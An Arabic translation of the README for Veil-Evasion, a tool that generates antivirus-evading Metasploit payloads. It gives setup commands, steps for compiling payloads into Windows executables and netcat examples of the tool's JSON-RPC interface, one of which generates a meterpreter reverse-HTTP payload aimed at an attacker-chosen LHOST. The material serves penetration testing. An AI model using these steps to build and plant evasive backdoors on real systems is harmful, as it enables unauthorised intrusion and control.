
لم يعد Veil Evasion مدعومًا، استخدم Veil 3.0!
Veil-Evasion هي أداة مصممة لتوليد حمولات metasploit التي تتجاوز حلول مكافحة الفيروسات الشائعة.
ملاحظة: يجب إعادة تشغيل
./setup/setup.shبعد كل تحديث رئيسي للإصدار. إذا واجهت أي أخطاء رئيسية عند تشغيل Veil-Evasion، فجرّب أولاً إعادة تشغيل هذا السكربت لتثبيت أي حزم إضافية وتحديث ملف التهيئة المشترك.
Veil-Evasion قيد الدعم النشط حاليًا من قبل @ChrisTruncer، @TheMightyShiv، @HarmJ0y.
شكرًا لـ:
أو
ملاحظة: يجب أن يتم التثبيت بصلاحيات المستخدم المتميز. إذا لم تكن تستخدم Kali Linux، فضع
sudoأمام كل أمر أو بدّل إلى المستخدم الجذر قبل البدء.
قم بتشغيل setup.sh -c على Kali x86.
قم بتثبيت Python 2.7 و Py2Exe و PyCrypto و PyWin32 على جهاز ويندوز (لتجميع Py2Exe).
apt-get -y install git
git clone https://github.com/Veil-Framework/Veil-Evasion.git
cd Veil-Evasion/
cd setup
setup.sh -c
ملاحظة: يجب أن يتم ذلك بصلاحيات المستخدم المتميز. إذا لم تكن تستخدم Kali Linux، فضع
sudoأمام كل أمر أو بدّل إلى المستخدم الجذر قبل البدء.
في معظم الأحيان، لن يحتاج ملف الإعدادات في /etc/veil/settings.py إلى إعادة بناء، ولكن في بعض الحالات قد يُطلب منك ذلك. يتم إنشاء الملف بواسطة config/update.py.
من المهم أن تكون في الدليل config/ قبل تنفيذ update.py. إذا لم تكن كذلك، فسيكون settings.py غير صحيح وعند تشغيل Veil-Evasion سترى ما يلي.
Main Menu
0 payloads loaded
لا داعي للذعر. أدخل الدليل config/ وأعد تشغيل update.py.
صُمم Veil-Evasion ليعمل على Kali Linux، ولكن يجب أن يعمل على أي نظام قادر على تنفيذ سكريبتات Python. ببساطة قم باستدعاء Veil-Evasion من سطر الأوامر، واتبع القائمة لإنشاء حمولة. عند إنشاء الحمولة، سيسألك Veil-Evasion إذا كنت ترغب في تحويل ملف الحمولة إلى ملف تنفيذي بواسطة Pyinstaller أو Py2Exe.
إذا كنت تستخدم Pyinstaller، فسيقوم Veil-Evasion بتحويل حمولتك إلى ملف تنفيذي داخل Kali.
إذا كنت تستخدم Py2Exe، فسينشئ Veil-Evasion ثلاثة ملفات:
انقل جميع الملفات الثلاثة إلى جهاز ويندوز الخاص بك مع تثبيت Python. يجب وضع الملفات الثلاثة في جذر الدليل الذي تم تثبيت Python فيه (على الأرجح C:\Python27). قم بتشغيل السكريبت الدفعي لتحويل سكريبت Python إلى صيغة تنفيذية.
ضع الملف التنفيذي على جهازك الهدف بأي وسيلة ضرورية ولا تقع!
على جانب المستمع، قم بتشغيل:
./Veil-Evasion --rpc
سيبدأ هذا مستمعًا على المنفذ 4242.
على جانب العميل، ستحتاج إلى تشغيل برنامج عميل. يمكن أن يكون هذا سكريبتًا مخصصًا أو يمكن أن يكون بسيطًا مثل Netcat. ينفذ خادم RPC بروتوكول JSON-RPC. هذا مرجع جيد لتفسير الطلبات والاستجابات لـ JSON-RPC: http://json-rpc.org/wiki/specification
تنسيق طلب RPC هو كما يلي:
method="version" - يُرجع رقم إصدار Veil-Evasion الحالي
method="payloads" - يُرجع جميع الحمولات المحملة حاليًا
method="payload_options"
params="payload_name" - يُرجع الخيارات للحمولة المحددة
method="generate"
params=["payload=X",
"outputbase=Y"
"overwrite=Z",
"msfvenom=...",
"LHOST=blah] - يُنشئ الحمولة المحددة مع الخيارات المُعطاة ويُعيد مسار الملف التنفيذي المُنتج
هذا مثال بسيط للعمل مع Veil-Evasion باستخدام Netcat:
root@kali:~# nc 127.0.0.1 4242
{"method":"version","params":[],"id":0}
واستجابة الخادم:
{"id":0,"result":"2.21.4","error":null}
يمكن العثور على مثال لبرنامج عميل هنا: http://github.com/miligulmohar/python-symmetric-jsonrpc/blob/master/examples/client.py
ملاحظة: منفذ Veil-Evasion هو 4242. يجب تغيير هذا في client.py ليعمل معه.
من أجل إنشاء حمولة، يجب تضمين جميع المعاملات:
هذا مرجع جيد لفهم ما إذا كان pwnstaller قيد الاستخدام أم لا: http://www.verisgroup.com/blog/2014/05/07/pwnstaller-and-the-veil-framework/
مثال على إنشاء حمولة:
root@kali:~# nc 127.0.0.1 4242
{"method":"generate","params":["payload=c/meterpreter/rev_http","outputbase=payloadName","LHOST=192.168.1.11","LPORT=2121","pwnstaller=False"],"id":1"}
واستجابة الخادم:
{"id":8,"result":"/usr/share/veil-output/compiled/payloadName.exe","error":null}
ملاحظة: إذا لم يتم تحديد id في الطلب، فسيتم إيقاف تشغيل Veil-Evasion. ومع ذلك، يمكنك تقديم عدد لا يحصى من الطلبات الصالحة حتى يتم إيقاف تشغيل Veil-Evasion.
لإيقاف تشغيل خادم RPC، قم بتشغيل:
./Veil-Evasion --rpcshutdown